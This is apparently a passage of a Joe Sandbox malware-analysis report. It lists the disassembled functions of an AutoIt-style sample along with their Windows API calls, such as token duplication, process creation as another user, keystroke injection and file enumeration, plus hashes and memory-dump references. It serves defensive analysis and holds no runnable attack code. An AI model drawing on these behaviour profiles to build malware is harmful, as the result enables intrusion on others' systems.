                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __wfsopen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 197181222-0
                                                                                                                                                                                                                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                                                                                                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                                                                                                                                Function 0040DA20 Relevance: 1.3, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                                                                                                • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                                                                                                                                                                Function 040DE2E0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 040DE2F1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                • Instruction ID: 02bbd498446cb96f7d508308aac572713e3d8f8214ec3b61a790d535ba4e695e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EBE0E67494020DDFDB00EFB8D64D6AE7FB4EF04301F100561FD05E2280D6309D508A62

                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                                                                                                                                • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                                                                                                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CA7F
                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                                                                                                                                • ImageList_SetDragCursorImage.COMCTL32(00A2F2E8,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                                                                                                                                • ImageList_BeginDrag.COMCTL32(00A2F2E8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                                                                                                                                • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                                                                                                                                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                                                                                                                                • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CD12
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CD80
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                                                                                                                                • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CE93
                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,02E71A38,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047CF6B
                                                                                                                                                                                                                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,02E71A38,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                • API String ID: 3100379633-4164748364
                                                                                                                                                                                                                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                                                                                                                                Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00434420
                                                                                                                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                                                                                                                                • IsIconic.USER32(?), ref: 0043444F
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                                                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                                                                                                                • API String ID: 2889586943-2988720461
                                                                                                                                                                                                                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                                                                                                                                Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                                                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                                                                                                                                • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                                                                                                                                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                                                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00446498
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                                                                                                                                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                                                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                                                                                                                                • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                                                                                                                                • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                                                                                                                                • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                                                                                                                                • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                                                                                                                                • String ID: $@OH$default$winsta0
                                                                                                                                                                                                                • API String ID: 3324942560-3791954436
                                                                                                                                                                                                                • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                                                                                                                • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                                                                                                                                Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 004789D3
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478A1D
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478A4B
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478A79
                                                                                                                                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                                                                                                                                  • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478AA7
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478AD5
                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00478B03
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                • API String ID: 999945258-2428617273
                                                                                                                                                                                                                • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                                                                • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                                                                                                                Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00403623
                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0040367D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • _, xrefs: 0040371C
                                                                                                                                                                                                                • Error opening the file, xrefs: 00428231
                                                                                                                                                                                                                • Unterminated string, xrefs: 00428348
                                                                                                                                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                                                                • API String ID: 3393021363-188983378
                                                                                                                                                                                                                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                                                                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                                                                                                                Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                • String ID: *.*
